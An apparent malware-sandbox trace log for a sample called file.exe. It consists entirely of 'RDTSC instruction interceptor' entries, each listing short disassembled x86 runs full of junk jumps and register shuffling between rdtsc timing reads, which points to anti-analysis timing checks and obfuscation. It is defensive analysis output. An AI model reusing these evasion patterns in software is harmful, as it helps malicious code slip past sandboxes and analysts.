                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50801D4 second address: 5080208 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1B74BBC1D8h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080208 second address: 508020E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50603A8 second address: 50603D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B74BBC1CFh 0x00000009 jmp 00007F1B74BBC1D3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070C29 second address: 5070C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070C2F second address: 5070C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070C35 second address: 5070C53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx edx, cx 0x0000000d mov edi, eax 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1B751F19DBh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070EDB second address: 5070EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070EE1 second address: 5070F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B751F19E2h 0x00000009 add ah, FFFFFFD8h 0x0000000c jmp 00007F1B751F19DBh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F1B751F19E8h 0x00000018 xor ax, D238h 0x0000001d jmp 00007F1B751F19DBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070F3A second address: 5070F40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070F40 second address: 5070F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090DC7 second address: 5090DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090DCB second address: 5090DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090DCF second address: 5090DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090DD5 second address: 5090E19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B751F19DFh 0x00000009 xor cl, FFFFFFBEh 0x0000000c jmp 00007F1B751F19E9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1B751F19DDh 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090E19 second address: 5090E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1CCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090E29 second address: 5090E2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090E2D second address: 5090EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F1B74BBC1CCh 0x0000000e mov dword ptr [esp], ecx 0x00000011 pushad 0x00000012 push eax 0x00000013 pushfd 0x00000014 jmp 00007F1B74BBC1CDh 0x00000019 adc si, C906h 0x0000001e jmp 00007F1B74BBC1D1h 0x00000023 popfd 0x00000024 pop eax 0x00000025 mov edx, 3657F424h 0x0000002a popad 0x0000002b mov eax, dword ptr [774365FCh] 0x00000030 jmp 00007F1B74BBC1D3h 0x00000035 test eax, eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F1B74BBC1D0h 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090EA1 second address: 5090EA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090FAD second address: 50A003E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F1B7941C1CFh 0x00000011 mov edi, edi 0x00000013 jmp 00007F1B74BBC1CEh 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov si, 09DDh 0x0000001e mov edx, esi 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov al, dl 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F1B74BBC1CCh 0x0000002d adc esi, 56A8A768h 0x00000033 jmp 00007F1B74BBC1CBh 0x00000038 popfd 0x00000039 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A003E second address: 50A004C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A004C second address: 50A0050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0050 second address: 50A0056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0056 second address: 50A006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1D5h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A006F second address: 50A0073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A0073 second address: 50A00A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007F1B74BBC1D2h 0x00000015 and eax, 3BC6BF58h 0x0000001b jmp 00007F1B74BBC1CBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A00A8 second address: 50A0113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1B751F19DFh 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1B751F19E0h 0x00000015 adc eax, 5C2A10E8h 0x0000001b jmp 00007F1B751F19DBh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F1B751F19E6h 0x00000029 jmp 00007F1B751F19E5h 0x0000002e popfd 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050016 second address: 50500B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F1B74BBC1D6h 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007F1B74BBC1D0h 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F1B74BBC1CEh 0x00000021 xor ax, FA98h 0x00000026 jmp 00007F1B74BBC1CBh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F1B74BBC1D8h 0x00000032 or ah, FFFFFFF8h 0x00000035 jmp 00007F1B74BBC1CBh 0x0000003a popfd 0x0000003b popad 0x0000003c and esp, FFFFFFF8h 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F1B74BBC1D5h 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50500B0 second address: 50500B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50500B5 second address: 50500E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B74BBC1CDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d jmp 00007F1B74BBC1CEh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1B74BBC1CEh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50500E9 second address: 505019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F1B751F19DDh 0x0000000c and si, F456h 0x00000011 jmp 00007F1B751F19E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ecx 0x0000001b jmp 00007F1B751F19DEh 0x00000020 xchg eax, ebx 0x00000021 jmp 00007F1B751F19E0h 0x00000026 push eax 0x00000027 jmp 00007F1B751F19DBh 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e call 00007F1B751F19E4h 0x00000033 push eax 0x00000034 pop edi 0x00000035 pop ecx 0x00000036 pushfd 0x00000037 jmp 00007F1B751F19E7h 0x0000003c adc cx, 504Eh 0x00000041 jmp 00007F1B751F19E9h 0x00000046 popfd 0x00000047 popad 0x00000048 mov ebx, dword ptr [ebp+10h] 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505019C second address: 50501A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50501A0 second address: 50501C7 instructions: 0x00000000 rdtsc 0x00000002 mov bl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 jmp 00007F1B751F19DEh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1B751F19DEh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50501C7 second address: 50501DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov ebx, 2AC79B40h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50501DC second address: 50501E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50501E0 second address: 50501F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50501F0 second address: 5050235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F1B751F19E9h 0x00000013 xchg eax, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 call 00007F1B751F19E3h 0x0000001c pop eax 0x0000001d mov edx, 489AF05Ch 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050235 second address: 505028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1B74BBC1D3h 0x00000010 xchg eax, edi 0x00000011 pushad 0x00000012 mov si, F8CBh 0x00000016 pushfd 0x00000017 jmp 00007F1B74BBC1D0h 0x0000001c jmp 00007F1B74BBC1D5h 0x00000021 popfd 0x00000022 popad 0x00000023 test esi, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov bh, 2Eh 0x0000002a movzx esi, bx 0x0000002d popad 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505028C second address: 50502C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1BE754FD4Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F1B751F19E8h 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502C1 second address: 50502DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 6FDD299Dh 0x00000008 push eax 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502DB second address: 50502DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502DF second address: 50502F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50502F0 second address: 5050350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov di, 2EBEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F1BE754FD05h 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F1B751F19DBh 0x00000019 adc ecx, 01E1C36Eh 0x0000001f jmp 00007F1B751F19E9h 0x00000024 popfd 0x00000025 mov ebx, esi 0x00000027 popad 0x00000028 mov edx, dword ptr [esi+44h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F1B751F19E9h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050350 second address: 5050356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050356 second address: 505035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505035A second address: 505035E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505035E second address: 50503A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b jmp 00007F1B751F19DFh 0x00000010 test edx, 61000000h 0x00000016 pushad 0x00000017 mov edi, esi 0x00000019 mov esi, 6F8E00B7h 0x0000001e popad 0x0000001f jne 00007F1BE754FCD7h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F1B751F19E9h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50503A8 second address: 50503AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50503AE second address: 50503B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50503B2 second address: 50503B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50407CD second address: 50407FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F1B751F19DCh 0x00000010 pop edx 0x00000011 movzx esi, dx 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50407FC second address: 5040800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040800 second address: 5040804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040804 second address: 504080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504080A second address: 5040834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B751F19E7h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040834 second address: 504083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504083A second address: 504083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504083E second address: 5040854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1B74BBC1CAh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040854 second address: 504086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504086C second address: 5040870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040870 second address: 5040874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040874 second address: 504087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504087A second address: 50408CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B751F19E8h 0x00000009 and ch, FFFFFF88h 0x0000000c jmp 00007F1B751F19DBh 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F1B751F19DEh 0x0000001f adc ax, 31E8h 0x00000024 jmp 00007F1B751F19DBh 0x00000029 popfd 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50408CC second address: 504090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop esi 0x00000010 pushfd 0x00000011 jmp 00007F1B74BBC1CFh 0x00000016 or cx, F1DEh 0x0000001b jmp 00007F1B74BBC1D9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504090C second address: 5040992 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B751F19E7h 0x00000009 sub si, 6BEEh 0x0000000e jmp 00007F1B751F19E9h 0x00000013 popfd 0x00000014 mov di, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c jmp 00007F1B751F19E8h 0x00000021 movzx eax, dx 0x00000024 popad 0x00000025 push ebp 0x00000026 pushad 0x00000027 movsx edx, ax 0x0000002a popad 0x0000002b mov dword ptr [esp], esi 0x0000002e jmp 00007F1B751F19DEh 0x00000033 mov esi, dword ptr [ebp+08h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F1B751F19DAh 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040992 second address: 50409A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50409A1 second address: 50409CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1B751F19DAh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50409CC second address: 50409F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, FDh 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1B74BBC1D7h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50409F4 second address: 50409FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50409FA second address: 5040A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1BE6F21B42h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1B74BBC1CAh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A26 second address: 5040A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A2A second address: 5040A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A30 second address: 5040AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1B751F19DCh 0x00000009 and si, FCD8h 0x0000000e jmp 00007F1B751F19DBh 0x00000013 popfd 0x00000014 call 00007F1B751F19E8h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 pushad 0x00000025 mov ebx, 07E6EA02h 0x0000002a popad 0x0000002b mov ecx, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov edi, eax 0x00000032 pushfd 0x00000033 jmp 00007F1B751F19DAh 0x00000038 sub eax, 60724198h 0x0000003e jmp 00007F1B751F19DBh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040AA0 second address: 5040AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1BE6F21AACh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040AC8 second address: 5040AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1B751F19E9h 0x0000000a sub si, E096h 0x0000000f jmp 00007F1B751F19E1h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040AFE second address: 5040B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [77436968h], 00000002h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov di, B9CEh 0x00000017 mov dl, A4h 0x00000019 popad 0x0000001a rdtsc
